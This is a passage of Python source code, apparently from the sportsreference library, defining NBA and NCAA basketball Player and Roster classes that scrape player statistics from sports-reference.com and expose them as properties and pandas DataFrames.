def three_point_attempt_rate(self):
"""
Returns a ``float`` of the percentage of field goals that are shot from
beyond the 3-point arc. Percentage ranges from 0-1.
"""
return self._three_point_attempt_rate
@_float_property_decorator
def free_throw_attempt_rate(self):
"""
Returns a ``float`` of the number of free throw attempts per field goal
attempt.
"""
return self._free_throw_attempt_rate
@_float_property_decorator
def offensive_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available offensive rebounds
the player grabbed. Percentage ranges from 0-100.
"""
return self._offensive_rebound_percentage
@_float_property_decorator
def defensive_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available defensive rebounds
the player grabbed. Percentage ranges from 0-100.
"""
return self._defensive_rebound_percentage
@_float_property_decorator
def total_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available rebounds the player
grabbed, both offensive and defensive. Percentage ranges from 0-100.
"""
return self._total_rebound_percentage
@_float_property_decorator
def assist_percentage(self):
"""
Returns a ``float`` of the percentage of field goals the player
assisted while on the floor. Percentage ranges from 0-100.
"""
return self._assist_percentage
@_float_property_decorator
def steal_percentage(self):
"""
Returns a ``float`` of the percentage of defensive possessions that
ended with the player stealing the ball while on the floor. Percentage
ranges from 0-100.
"""
return self._steal_percentage
@_float_property_decorator
def block_percentage(self):
"""
Returns a ``float`` of the percentage of opposing two-point field goal
attempts that were blocked by the player while on the floor. Percentage
ranges from 0-100.
"""
return self._block_percentage
@_float_property_decorator
def turnover_percentage(self):
"""
Returns a ``float`` of the average number of turnovers per 100
possessions by the player.
"""
return self._turnover_percentage
@_float_property_decorator
def usage_percentage(self):
"""
Returns a ``float`` of the percentage of plays the player is involved
in while on the floor. Percentage ranges from 0-100.
"""
return self._usage_percentage
@_float_property_decorator
def offensive_win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his offensive plays.
"""
return self._offensive_win_shares
@_float_property_decorator
def defensive_win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his defensive plays.
"""
return self._defensive_win_shares
@_float_property_decorator
def win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his offensive and defensive plays.
"""
return self._win_shares
@_float_property_decorator
def win_shares_per_48_minutes(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team per 48 minutes of playtime. An average player has a contribution
of 0.100.
"""
return self._win_shares_per_48_minutes
@_float_property_decorator
def offensive_box_plus_minus(self):
"""
Returns a ``float`` of the number of offensive points per 100
possessions the player contributed in comparison to an average player
in the league.
"""
return self._offensive_box_plus_minus
@_float_property_decorator
def defensive_box_plus_minus(self):
"""
Returns a ``float`` of the number of defensive points per 100
possessions the player contributed in comparison to an average player
in the league.
"""
return self._defensive_box_plus_minus
@_float_property_decorator
def box_plus_minus(self):
"""
Returns a ``float`` of the total number of points per 100 possessions
the player contributed in comparison to an average player in the
league.
"""
return self._box_plus_minus
@_float_property_decorator
def value_over_replacement_player(self):
"""
Returns a ``float`` of the total number of points per 100 team
possessions the player contributed compared to a replacement-level
player (who has an average score of -2.0). This value is prorated for
an 82-game season.
"""
return self._value_over_replacement_player
@_float_property_decorator
def shooting_distance(self):
"""
Returns a ``float`` of the average distance the player takes a shot
from in feet.
"""
return self._shooting_distance
@_float_property_decorator
def percentage_shots_two_pointers(self):
"""
Returns a ``float`` of the percentage of shots the player takes that
are 2-pointers. Percentage ranges from 0-1.
"""
return self._percentage_shots_two_pointers
@_float_property_decorator
def percentage_zero_to_three_footers(self):
"""
Returns a ``float`` of the percentage of shots the player takes from
zero to three feet from the basket. Percentage ranges from 0-1.
"""
return self._percentage_zero_to_three_footers
@_float_property_decorator
def percentage_three_to_ten_footers(self):
"""
Returns a ``float`` of the percentage of shots the player takes from
three to ten feet from the basket. Percentage ranges from 0-1.
"""
return self._percentage_three_to_ten_footers
@_float_property_decorator
def percentage_ten_to_sixteen_footers(self):
"""
Returns a ``float`` of the percentage of shots the player takes from
ten to sixteen feet from the basket. Percentage ranges from 0-1.
"""
return self._percentage_ten_to_sixteen_footers
@_float_property_decorator
def percentage_sixteen_foot_plus_two_pointers(self):
"""
Returns a ``float`` of the percentage of shots the player takes that
are greater than sixteen feet from the basket, but in front of or on
the three point arc. Percentage ranges from 0-1.
"""
return self._percentage_sixteen_foot_plus_two_pointers
@_float_property_decorator
def percentage_shots_three_pointers(self):
"""
Returns a ``float`` of the percentage of shots the player takes from
beyond the three point arc. Percentage ranges from 0-1.
"""
return self._percentage_shots_three_pointers
@_float_property_decorator
def field_goal_perc_zero_to_three_feet(self):
"""
Returns a ``float`` of the player's field goal percentage for shots
between zero and three feet from the basket. Percentage ranges from
0-1.
"""
return self._field_goal_perc_zero_to_three_feet
@_float_property_decorator
def field_goal_perc_three_to_ten_feet(self):
"""
Returns a ``float`` of the player's field goal percentage for shots
between three and ten feet from the basket. Percentage ranges from
0-1.
"""
return self._field_goal_perc_three_to_ten_feet
@_float_property_decorator
def field_goal_perc_ten_to_sixteen_feet(self):
"""
Returns a ``float`` of the player's field goal percentage for shots
between ten and sixteen feet from the basket. Percentage ranges from
0-1.
"""
return self._field_goal_perc_ten_to_sixteen_feet
@_float_property_decorator
def field_goal_perc_sixteen_foot_plus_two_pointers(self):
"""
Returns a ``float`` of the player's field goal percentage for shots
that are greater than sixteen feet from the basket, but in front
of or on the three point arc. Percentage ranges from 0-1.
"""
return self._field_goal_perc_sixteen_foot_plus_two_pointers
@_float_property_decorator
def two_pointers_assisted_percentage(self):
"""
Returns a ``float`` of the percentage of 2-point field goals by the
player that are assisted. Percentage ranges from 0-1.
"""
return self._two_pointers_assisted_percentage
@_float_property_decorator
def percentage_field_goals_as_dunks(self):
"""
Returns a ``float`` of the percentage of the player's shot attempts
that are dunks. Percentage ranges from 0-1.
"""
return self._percentage_field_goals_as_dunks
@_int_property_decorator
def dunks(self):
"""
Returns an ``int`` of the total number of dunks the player made during
the season.
"""
return self._dunks
@_float_property_decorator
def three_pointers_assisted_percentage(self):
"""
Returns a ``float`` of the percentage of 3-point field goals by the
player that are assisted. Percentage ranges from 0-1.
"""
return self._three_pointers_assisted_percentage
@_float_property_decorator
def percentage_of_three_pointers_from_corner(self):
"""
Returns a ``float`` of the percentage of 3-point shots the player
attempted from the corner. Percentage ranges from 0-1.
"""
return self._percentage_of_three_pointers_from_corner
@_float_property_decorator
def three_point_shot_percentage_from_corner(self):
"""
Returns a ``float`` of the percentage of 3-pointers from the corner
that went in. Percentage ranges from 0-1.
"""
return self._three_point_shot_percentage_from_corner
@_int_property_decorator
def half_court_heaves(self):
"""
Returns an ``int`` of the number of shots the player took from beyond
mid-court.
"""
return self._half_court_heaves
@_int_property_decorator
def half_court_heaves_made(self):
"""
Returns an ``int`` of the number of shots the player made from beyond
mid-court.
"""
return self._half_court_heaves_made
@_int_property_decorator_default_zero
def point_guard_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
point guard. Percentage ranges from 0-100 and is rounded to the
nearest whole number.
"""
return self._point_guard_percentage
@_int_property_decorator_default_zero
def shooting_guard_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
shooting guard. Percentage ranges from 0-100 and is rounded to the
nearest whole number.
"""
return self._shooting_guard_percentage
@_int_property_decorator_default_zero
def small_forward_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
small forward. Percentage ranges from 0-100 and is rounded to the
nearest whole number.
"""
return self._small_forward_percentage
@_int_property_decorator_default_zero
def power_forward_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
power forward. Percentage ranges from 0-100 and is rounded to the
nearest whole number.
"""
return self._power_forward_percentage
@_int_property_decorator_default_zero
def center_percentage(self):
"""
Returns an ``int`` of the percentage of time the player spent as a
center. Percentage ranges from 0-100 and is rounded to the nearest
whole number.
"""
return self._center_percentage
@_float_property_decorator
def on_court_plus_minus(self):
"""
Returns a ``float`` of the number of points the player contributes to
the team while on the court per 100 possessions.
"""
return self._on_court_plus_minus
@_float_property_decorator
def net_plus_minus(self):
"""
Returns a ``float`` of the net number of points the player contributes
to the team per 100 possessions regardless of being on the floor or
not.
"""
return self._net_plus_minus
@_int_property_decorator
def passing_turnovers(self):
"""
Returns an ``int`` of the total number of turnovers the player
committed due to a bad pass.
"""
return self._passing_turnovers
@_int_property_decorator
def lost_ball_turnovers(self):
"""
Returns an ``int`` of the total number of turnovers the player
committed due to losing the ball.
"""
return self._lost_ball_turnovers
@_int_property_decorator
def other_turnovers(self):
"""
Returns an ``int`` of the total number of all other non-passing/
dribbling turnovers the player committed.
"""
return self._other_turnovers
@_int_property_decorator
def shooting_fouls(self):
"""
Returns an ``int`` of the total number of shooting fouls the player
committed.
"""
return self._shooting_fouls
@_int_property_decorator
def blocking_fouls(self):
"""
Returns an ``int`` of the total number of blocking fouls the player
committed.
"""
return self._blocking_fouls
@_int_property_decorator
def offensive_fouls(self):
"""
Returns an ``int`` of the total number of offensive fouls the player
committed.
"""
return self._offensive_fouls
@_int_property_decorator
def take_fouls(self):
"""
Returns an ``int`` of the total number of take fouls the player
committed by taking a foul before the offensive player has a chance to
make a shooting motion.
"""
return self._take_fouls
@_int_property_decorator
def points_generated_by_assists(self):
"""
Returns an ``int`` of the total number of points the player generated
as a result of him assisting the shooter.
"""
return self._points_generated_by_assists
@_int_property_decorator
def shooting_fouls_drawn(self):
"""
Returns an ``int`` of the total number of shooting fouls the player
drew during the season.
"""
return self._shooting_fouls_drawn
@_int_property_decorator
def and_ones(self):
"""
Returns an ``int`` of the total number of times the player was fouled
in the act of shooting and made the basket.
"""
return self._and_ones
@_int_property_decorator
def shots_blocked(self):
"""
Returns an ``int`` of the total number of shots the player took that
were blocked by an opposing player.
"""
return self._shots_blocked
@_int_property_decorator
def salary(self):
"""
Returns an ``int`` of the player's annual salary rounded down.
"""
return self._salary
@property
def contract(self):
"""
Returns a ``dictionary`` of the player's contract details where the key
is a ``string`` of the season, such as '2018-19', and the value is a
``string`` of the salary, such as '$40,000,000'.
"""
return self._contract
class Roster(object):
"""
Get stats for all players on a roster.
Request a team's roster for a given season and create instances of the
Player class for each player, containing a detailed list of the players
statistics and information.
Parameters
----------
team : string
The team's 3-letter abbreviation, such as 'HOU' for the Houston
Rockets.
year : string (optional)
The 4-digit year to pull the roster from, such as '2018'. If left
blank, defaults to the most recent season.
"""
def __init__(self, team, year=None):
self._team = team
self._players = []
self._find_players(year)
def _pull_team_page(self, url):
"""
Download the team page.
Download the requested team's season page and create a PyQuery object.
Parameters
----------
url : string
A string of the built URL for the requested team and season.
Returns
-------
PyQuery object
Returns a PyQuery object of the team's HTML page.
"""
try:
return pq(url)
except HTTPError:
return None
def _create_url(self, year):
"""
Build the team URL.
Build a URL given a team's 3-letter abbreviation and the 4-digit year.
Parameters
----------
year : string
The 4-digit string representing the year to pull the team's roster
from.
Returns
-------
string
Returns a string of the team's season page for the requested team
and year.
"""
return ROSTER_URL % (self._team.upper(), year)
def _get_id(self, player):
"""
Parse the player ID.
Given a PyQuery object representing a single player on the team roster,
parse the player ID and return it as a string.
Parameters
----------
player : PyQuery object
A PyQuery object representing the player information from the
roster table.
Returns
-------
string
Returns a string of the player ID.
"""
name_tag = player('td[data-stat="player"] a')
name = re.sub(r'.*/players/./', '', str(name_tag))
return re.sub(r'\.html.*', '', name)
def _find_players(self, year):
"""
Find all player IDs for the requested team.
For the requested team and year (if applicable), pull the roster table
and parse the player ID for all players on the roster and create an
instance of the Player class for the player. All player instances are
added to the 'players' property to get all stats for all players on a
team.
Parameters
----------
year : string
The 4-digit string representing the year to pull the team's roster
from.
"""
if not year:
year = utils._find_year_for_season('nba')
url = self._create_url(year)
page = self._pull_team_page(url)
if not page:
output = ("Can't pull requested team page. Ensure the following "
"URL exists: %s" % url)
raise ValueError(output)
players = page('table#roster tbody tr').items()
for player in players:
player_id = self._get_id(player)
player_instance = Player(player_id)
self._players.append(player_instance)
@property
def players(self):
"""
Returns a ``list`` of player instances for each player on the requested
team's roster.
"""
return self._players
```
#### File: sportsreference/ncaab/roster.py
```python
import pandas as pd
import re
from functools import wraps
from pyquery import PyQuery as pq
from .. import utils
from .constants import PLAYER_SCHEME, PLAYER_URL, ROSTER_URL
from six.moves.urllib.error import HTTPError
def _cleanup(prop):
try:
prop = prop.replace('%', '')
prop = prop.replace(',', '')
return prop.replace('+', '')
# Occurs when a value is of Nonetype. When that happens, return a blank
# string as whatever have come in had an incomplete value.
except AttributeError:
return ''
def _int_property_decorator(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return int(value)
except ValueError:
# If there is no value, default to None
return None
return wrapper
def _float_property_decorator(func):
@property
@wraps(func)
def wrapper(*args):
index = args[0]._index
prop = func(*args)
value = _cleanup(prop[index])
try:
return float(value)
except ValueError:
# If there is no value, default to None
return None
return wrapper
def _most_recent_decorator(func):
@property
@wraps(func)
def wrapper(*args):
season = args[0]._most_recent_season
seasons = args[0]._season
index = seasons.index(season)
prop = func(*args)
return prop[index]
return wrapper
class Player(object):
"""
Get player information and stats for all seasons.
Given a player ID, such as 'carsen-edwards-1' for Carsen Edwards, capture
all relevant stats and information like name, height/weight, career
three-pointers, last season's offensive rebounds, offensive points
contributed, and much more.
By default, the class instance will return the player's career stats, but
single-season stats can be found by calling the instance with the requested
season as denoted on sports-reference.com.
Parameters
----------
player_id : string
A player's ID according to sports-reference.com, such as
'carsen-edwards-1' for Carsen Edwards. The player ID can be found by
navigating to the player's stats page and getting the string between
the final slash and the '.html' in the URL. In general, the ID is in
the format 'first-last-N' where 'first' is the player's first name in
lowercase, 'last' is the player's last name in lowercase, and 'N' is a
number starting at '1' for the first time that player ID has been used
and increments by 1 for every successive player.
"""
def __init__(self, player_id):
self._most_recent_season = ''
self._index = None
self._player_id = player_id
self._season = None
self._name = None
self._team_abbreviation = None
self._conference = None
self._position = None
self._height = None
self._weight = None
self._games_played = None
self._games_started = None
self._minutes_played = None
self._field_goals = None
self._field_goal_attempts = None
self._field_goal_percentage = None
self._three_pointers = None
self._three_point_attempts = None
self._three_point_percentage = None
self._two_pointers = None
self._two_point_attempts = None
self._two_point_percentage = None
self._free_throws = None
self._free_throw_attempts = None
self._free_throw_percentage = None
self._offensive_rebounds = None
self._defensive_rebounds = None
self._total_rebounds = None
self._assists = None
self._steals = None
self._blocks = None
self._turnovers = None
self._personal_fouls = None
self._points = None
self._player_efficiency_rating = None
self._true_shooting_percentage = None
self._effective_field_goal_percentage = None
self._three_point_attempt_rate = None
self._free_throw_attempt_rate = None
self._points_produced = None
self._offensive_rebound_percentage = None
self._defensive_rebound_percentage = None
self._total_rebound_percentage = None
self._assist_percentage = None
self._steal_percentage = None
self._block_percentage = None
self._turnover_percentage = None
self._usage_percentage = None
self._offensive_win_shares = None
self._defensive_win_shares = None
self._win_shares = None
self._win_shares_per_40_minutes = None
self._offensive_box_plus_minus = None
self._defensive_box_plus_minus = None
self._box_plus_minus = None
self._parse_player_data()
self._find_initial_index()
def _retrieve_html_page(self):
"""
Download the requested player's stats page.
Download the requested page and strip all of the comment tags before
returning a pyquery object which will be used to parse the data.
Returns
-------
PyQuery object
The requested page is returned as a queriable PyQuery object with
the comment tags removed.
"""
url = PLAYER_URL % self._player_id
try:
url_data = pq(url)
except HTTPError:
return None
return pq(utils._remove_html_comment_tags(url_data))
def _parse_season(self, row):
"""
Parse the season string from the table.
The season is generally located in the first column of the stats tables
and should be parsed to denote which season metrics are being pulled
from.
Parameters
----------
row : PyQuery object
A PyQuery object of a single row in a stats table.
Returns
-------
string
A string representation of the season in the format 'YYYY-YY', such
as '2017-18'.
"""
return utils._parse_field(PLAYER_SCHEME, row, 'season')
def _combine_season_stats(self, table_rows, career_stats, all_stats_dict):
"""
Combine all stats for each season.
Since all of the stats are spread across multiple tables, they should
be combined into a single field which can be used to easily query stats
at once.
Parameters
----------
table_rows : generator
A generator where each element is a row in a stats table.
career_stats : generator
A generator where each element is a row in the footer of a stats
table. Career stats are kept in the footer, hence the usage.
all_stats_dict : dictionary
A dictionary of all stats separated by season where each key is the
season ``string``, such as '2017-18', and the value is a
``dictionary`` with a ``string`` of 'data' and ``string``
containing all of the data.
Returns
-------
dictionary
Returns an updated version of the passed all_stats_dict which
includes more metrics from the provided table.
"""
most_recent_season = ''
for row in table_rows:
season = self._parse_season(row)
try:
all_stats_dict[season]['data'] += str(row)
except KeyError:
all_stats_dict[season] = {'data': str(row)}
most_recent_season = season
self._most_recent_season = most_recent_season
try:
all_stats_dict['career']['data'] += str(next(career_stats))
except KeyError:
all_stats_dict['career'] = {'data': str(next(career_stats))}
return all_stats_dict
def _combine_all_stats(self, player_info):
"""
Pull stats from all tables into single data structure.
Pull the stats from all of the requested tables into a dictionary that
is separated by season to allow easy queries of the player's stats for
each season.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing all of the stats information for the
requested player.
Returns
-------
dictionary
Returns a dictionary where all stats from each table are combined
by season to allow easy queries by year.
"""
all_stats_dict = {}
for table_id in ['players_totals', 'players_advanced']:
table_items = utils._get_stats_table(player_info,
'table#%s' % table_id)
career_items = utils._get_stats_table(player_info,
'table#%s' % table_id,
footer=True)
all_stats_dict = self._combine_season_stats(table_items,
career_items,
all_stats_dict)
return all_stats_dict
def _parse_player_information(self, player_info, field):
"""
Parse general player information.
Parse general player information such as height and weight. The
attribute for the requested field will be set with the value prior to
returning.
Parameters
----------
player_info : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
field : string
A string of the attribute to parse, such as 'weight'.
"""
short_field = str(field)[1:]
value = utils._parse_field(PLAYER_SCHEME, player_info, short_field)
setattr(self, field, value)
def _parse_player_position(self, player_info):
"""
Parse the player's position.
The player's position isn't contained within a unique tag and the
player's meta information should be iterated through until 'Position'
is found as it contains the desired text.
Parameters
----------
player_info : PyQuery object
A PyQuery object of the player's information on the HTML stats
page.
Returns
-------
string
Returns a string of the player's position, such as 'Guard'.
"""
for section in player_info('div#meta p').items():
if 'Position' in str(section):
return section.text().replace('Position: ', '')
def _parse_conference(self, stats):
"""
Parse the conference abbreviation for the player's team.
The conference abbreviation is embedded within the conference name tag
and should be special-parsed to extract it.
Parameters
----------
stats : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
Returns
-------
string
Returns a string of the conference abbreviation, such as 'big-12'.
"""
conference_tag = stats(PLAYER_SCHEME['conference'])
conference = re.sub(r'.*/cbb/conferences/',
'',
str(conference_tag('a')))
conference = re.sub(r'/.*', '', conference)
return conference
def _parse_team_abbreviation(self, stats):
"""
Parse the team abbreviation.
The team abbreviation is embedded within the team name tag and should
be special-parsed to extract it.
Parameters
----------
stats : PyQuery object
A PyQuery object containing the HTML from the player's stats page.
Returns
-------
string
Returns a string of the team's abbreviation, such as 'PURDUE' for
the Purdue Boilermakers.
"""
team_tag = stats(PLAYER_SCHEME['team_abbreviation'])
team = re.sub(r'.*/cbb/schools/', '', str(team_tag('a')))
team = re.sub(r'/.*', '', team)
return team
def _parse_player_data(self):
"""
Parse all player information and set attributes.
Pull the player's HTML stats page and go through each class attribute
to parse the data from the HTML page and set attribute value with the
result.
"""
player_info = self._retrieve_html_page()
all_stats_dict = self._combine_all_stats(player_info)
for field in self.__dict__:
short_field = str(field)[1:]
if short_field == 'player_id' or \
short_field == 'index' or \
short_field == 'most_recent_season':
continue
if short_field == 'name' or \
short_field == 'weight' or \
short_field == 'height':
self._parse_player_information(player_info, field)
continue
if short_field == 'position':
value = self._parse_player_position(player_info)
setattr(self, field, value)
continue
field_stats = []
for year, data in all_stats_dict.items():
stats = pq(data['data'])
if short_field == 'conference':
value = self._parse_conference(stats)
elif short_field == 'team_abbreviation':
value = self._parse_team_abbreviation(stats)
else:
value = utils._parse_field(PLAYER_SCHEME,
stats,
short_field)
field_stats.append(value)
setattr(self, field, field_stats)
def _find_initial_index(self):
"""
Find the index of career stats.
When the Player class is instantiated, the default stats to pull are
the player's career stats. Upon being called, the index of the 'Career'
element should be the index value.
"""
index = 0
for season in self._season:
if season == 'Career':
self._index = index
break
index += 1
def __call__(self, requested_season=''):
"""
Specify a different season to pull stats from.
A different season can be requested by passing the season string, such
as '2017-18' to the class instance.
Parameters
----------
requested_season : string (optional)
A string of the requested season to query, such as '2017-18'. If
left blank or 'Career' is passed, the career stats will be used for
stats queries.
Returns
-------
Player class instance
Returns the class instance with the updated stats being referenced.
"""
if requested_season.lower() == 'career' or \
requested_season == '':
requested_season = 'Career'
index = 0
for season in self._season:
if season == requested_season:
self._index = index
break
index += 1
return self
def _dataframe_fields(self):
"""
Creates a dictionary of all fields to include with DataFrame.
With the result of the calls to class properties changing based on the
class index value, the dictionary should be regenerated every time the
index is changed when the dataframe property is requested.
Returns
-------
dictionary
Returns a dictionary where the keys are the shortened ``string``
attribute names and the values are the actual value for each
attribute for the specified index.
"""
fields_to_include = {
'assist_percentage': self.assist_percentage,
'assists': self.assists,
'block_percentage': self.block_percentage,
'blocks': self.blocks,
'box_plus_minus': self.box_plus_minus,
'conference': self.conference,
'defensive_box_plus_minus': self.defensive_box_plus_minus,
'defensive_rebound_percentage': self.defensive_rebound_percentage,
'defensive_rebounds': self.defensive_rebounds,
'defensive_win_shares': self.defensive_win_shares,
'effective_field_goal_percentage':
self.effective_field_goal_percentage,
'field_goal_attempts': self.field_goal_attempts,
'field_goal_percentage': self.field_goal_percentage,
'field_goals': self.field_goals,
'free_throw_attempt_rate': self.free_throw_attempt_rate,
'free_throw_attempts': self.free_throw_attempts,
'free_throw_percentage': self.free_throw_percentage,
'free_throws': self.free_throws,
'games_played': self.games_played,
'games_started': self.games_started,
'height': self.height,
'minutes_played': self.minutes_played,
'offensive_box_plus_minus': self.offensive_box_plus_minus,
'offensive_rebound_percentage': self.offensive_rebound_percentage,
'offensive_rebounds': self.offensive_rebounds,
'offensive_win_shares': self.offensive_win_shares,
'personal_fouls': self.personal_fouls,
'player_efficiency_rating': self.player_efficiency_rating,
'player_id': self.player_id,
'points': self.points,
'points_produced': self.points_produced,
'position': self.position,
'steal_percentage': self.steal_percentage,
'steals': self.steals,
'team_abbreviation': self.team_abbreviation,
'three_point_attempt_rate': self.three_point_attempt_rate,
'three_point_attempts': self.three_point_attempts,
'three_point_percentage': self.three_point_percentage,
'three_pointers': self.three_pointers,
'total_rebound_percentage': self.total_rebound_percentage,
'total_rebounds': self.total_rebounds,
'true_shooting_percentage': self.true_shooting_percentage,
'turnover_percentage': self.turnover_percentage,
'turnovers': self.turnovers,
'two_point_attempts': self.two_point_attempts,
'two_point_percentage': self.two_point_percentage,
'two_pointers': self.two_pointers,
'usage_percentage': self.usage_percentage,
'weight': self.weight,
'win_shares': self.win_shares,
'win_shares_per_40_minutes': self.win_shares_per_40_minutes,
}
return fields_to_include
@property
def dataframe(self):
"""
Returns a ``pandas DataFrame`` containing all other relevant class
properties and values where each index is a different season plus the
career stats.
"""
temp_index = self._index
rows = []
indices = []
for season in self._season:
self._index = self._season.index(season)
rows.append(self._dataframe_fields())
indices.append(season)
self._index = temp_index
return pd.DataFrame(rows, index=[indices])
@property
def player_id(self):
"""
Returns a ``string`` of the player's ID on sports-reference, such as
'carsen-edwards-1' for <NAME>.
"""
return self._player_id
@property
def season(self):
"""
Returns a ``string`` of the season in the format 'YYYY-YY', such as
'2017-18'. If no season was requested, the career stats will be
returned for the player and the season will default to 'Career'.
"""
return self._season[self._index]
@property
def conference(self):
"""
Returns a ``string`` of the abbreviation for the conference the team
participated in for the requested season.
"""
return self._conference[self._index]
@property
def name(self):
"""
Returns a ``string`` of the players name, such as '<NAME>'.
"""
return self._name
@_most_recent_decorator
def team_abbreviation(self):
"""
Returns a ``string`` of the abbrevation for the team the player plays
for, such as 'PURDUE' for Carsen Edwards.
"""
return self._team_abbreviation
@property
def position(self):
"""
Returns a ``string`` constant of the player's primary position.
"""
return self._position
@property
def height(self):
"""
Returns a ``string`` of the player's height in the format
"feet-inches".
"""
return self._height
@property
def weight(self):
"""
Returns an ``int`` of the player's weight in pounds.
"""
return int(self._weight.replace('lb', ''))
@_int_property_decorator
def games_played(self):
"""
Returns an ``int`` of the number of games the player participated in.
"""
return self._games_played
@_int_property_decorator
def games_started(self):
"""
Returns an ``int`` of the number of games the player started.
"""
return self._games_started
@_int_property_decorator
def minutes_played(self):
"""
Returns an ``int`` of the total number of minutes the player played.
"""
return self._minutes_played
@_int_property_decorator
def field_goals(self):
"""
Returns an ``int`` of the total number of field goals the player
scored.
"""
return self._field_goals
@_int_property_decorator
def field_goal_attempts(self):
"""
Returns an ``int`` of the total number of field goals the player
attempted during the season.
"""
return self._field_goal_attempts
@_float_property_decorator
def field_goal_percentage(self):
"""
Returns a ``float`` of the player's field goal percentage during the
season. Percentage ranges from 0-1.
"""
return self._field_goal_percentage
@_int_property_decorator
def three_pointers(self):
"""
Returns an ``int`` of the total number of three point field goals the
player made.
"""
return self._three_pointers
@_int_property_decorator
def three_point_attempts(self):
"""
Returns an ``int`` of the total number of three point field goals the
player attempted during the season.
"""
return self._three_point_attempts
@_float_property_decorator
def three_point_percentage(self):
"""
Returns a ``float`` of the player's three point field goal percentage
during the season. Percentage ranges from 0-1.
"""
return self._three_point_percentage
@_int_property_decorator
def two_pointers(self):
"""
Returns an ``int`` of the total number of two point field goals the
player made.
"""
return self._two_pointers
@_int_property_decorator
def two_point_attempts(self):
"""
Returns an ``int`` of the total number of two point field goals the
player attempted during the season.
"""
return self._two_point_attempts
@_float_property_decorator
def two_point_percentage(self):
"""
Returns a ``float`` of the player's two point field goal percentage
during the season. Percentage ranges from 0-1.
"""
return self._two_point_percentage
@_float_property_decorator
def effective_field_goal_percentage(self):
"""
Returns a ``float`` of the player's field goal percentage while giving
extra weight to 3-point field goals. Percentage ranges from 0-1.
"""
return self._effective_field_goal_percentage
@_int_property_decorator
def free_throws(self):
"""
Returns an ``int`` of the total number of free throws the player made
during the season.
"""
return self._free_throws
@_int_property_decorator
def free_throw_attempts(self):
"""
Returns an ``int`` of the total number of free throws the player
attempted during the season.
"""
return self._free_throw_attempts
@_float_property_decorator
def free_throw_percentage(self):
"""
Returns a ``float`` of the player's free throw percentage during the
season. Percentage ranges from 0-1.
"""
return self._free_throw_percentage
@_int_property_decorator
def offensive_rebounds(self):
"""
Returns an ``int`` of the total number of offensive rebounds the player
grabbed during the season.
"""
return self._offensive_rebounds
@_int_property_decorator
def defensive_rebounds(self):
"""
Returns an ``int`` of the total number of defensive rebounds the player
grabbed during the season.
"""
return self._defensive_rebounds
@_int_property_decorator
def total_rebounds(self):
"""
Returns an ``int`` of the total number of offensive and defensive
rebounds the player grabbed during the season.
"""
return self._total_rebounds
@_int_property_decorator
def assists(self):
"""
Returns an ``int`` of the total number of assists the player tallied
during the season.
"""
return self._assists
@_int_property_decorator
def steals(self):
"""
Returns an ``int`` of the total number of steals the player tallied
during the season.
"""
return self._steals
@_int_property_decorator
def blocks(self):
"""
Returns an ``int`` of the total number of shots the player blocked
during the season.
"""
return self._blocks
@_int_property_decorator
def turnovers(self):
"""
Returns an ``int`` of the total number of times the player turned the
ball over during the season for any reason.
"""
return self._turnovers
@_int_property_decorator
def personal_fouls(self):
"""
Returns an ``int`` of the total number of personal fouls the player
committed during the season.
"""
return self._personal_fouls
@_int_property_decorator
def points(self):
"""
Returns an ``int`` of the total number of points the player scored
during the season.
"""
return self._points
@_float_property_decorator
def player_efficiency_rating(self):
"""
Returns a ``float`` of the player's efficiency rating which represents
the player's relative production level. An average player in the league
has an efficiency rating of 15.
"""
return self._player_efficiency_rating
@_float_property_decorator
def true_shooting_percentage(self):
"""
Returns a ``float`` of the player's true shooting percentage which
takes into account two and three pointers as well as free throws.
Percentage ranges from 0-1.
"""
return self._true_shooting_percentage
@_float_property_decorator
def three_point_attempt_rate(self):
"""
Returns a ``float`` of the percentage of field goals that are shot from
beyond the 3-point arc. Percentage ranges from 0-1.
"""
return self._three_point_attempt_rate
@_float_property_decorator
def free_throw_attempt_rate(self):
"""
Returns a ``float`` of the number of free throw attempts per field goal
attempt.
"""
return self._free_throw_attempt_rate
@_int_property_decorator
def points_produced(self):
"""
Returns an ``int`` of the number of offensive points the player
produced.
"""
return self._points_produced
@_float_property_decorator
def offensive_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available offensive rebounds
the player grabbed. Percentage ranges from 0-100.
"""
return self._offensive_rebound_percentage
@_float_property_decorator
def defensive_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available defensive rebounds
the player grabbed. Percentage ranges from 0-100.
"""
return self._defensive_rebound_percentage
@_float_property_decorator
def total_rebound_percentage(self):
"""
Returns a ``float`` of the percentage of available rebounds the player
grabbed, both offensive and defensive. Percentage ranges from 0-100.
"""
return self._total_rebound_percentage
@_float_property_decorator
def assist_percentage(self):
"""
Returns a ``float`` of the percentage of field goals the player
assisted while on the floor. Percentage ranges from 0-100.
"""
return self._assist_percentage
@_float_property_decorator
def steal_percentage(self):
"""
Returns a ``float`` of the percentage of defensive possessions that
ended with the player stealing the ball while on the floor. Percentage
ranges from 0-100.
"""
return self._steal_percentage
@_float_property_decorator
def block_percentage(self):
"""
Returns a ``float`` of the percentage of opposing two-point field goal
attempts that were blocked by the player while on the floor. Percentage
ranges from 0-100.
"""
return self._block_percentage
@_float_property_decorator
def turnover_percentage(self):
"""
Returns a ``float`` of the average number of turnovers per 100
possessions by the player.
"""
return self._turnover_percentage
@_float_property_decorator
def usage_percentage(self):
"""
Returns a ``float`` of the percentage of plays the player is involved
in while on the floor. Percentage ranges from 0-100.
"""
return self._usage_percentage
@_float_property_decorator
def offensive_win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his offensive plays.
"""
return self._offensive_win_shares
@_float_property_decorator
def defensive_win_shares(self):
"""
Returns a ``float`` of the number of wins the player contributed to the
team as a result of his defensive plays.
"""
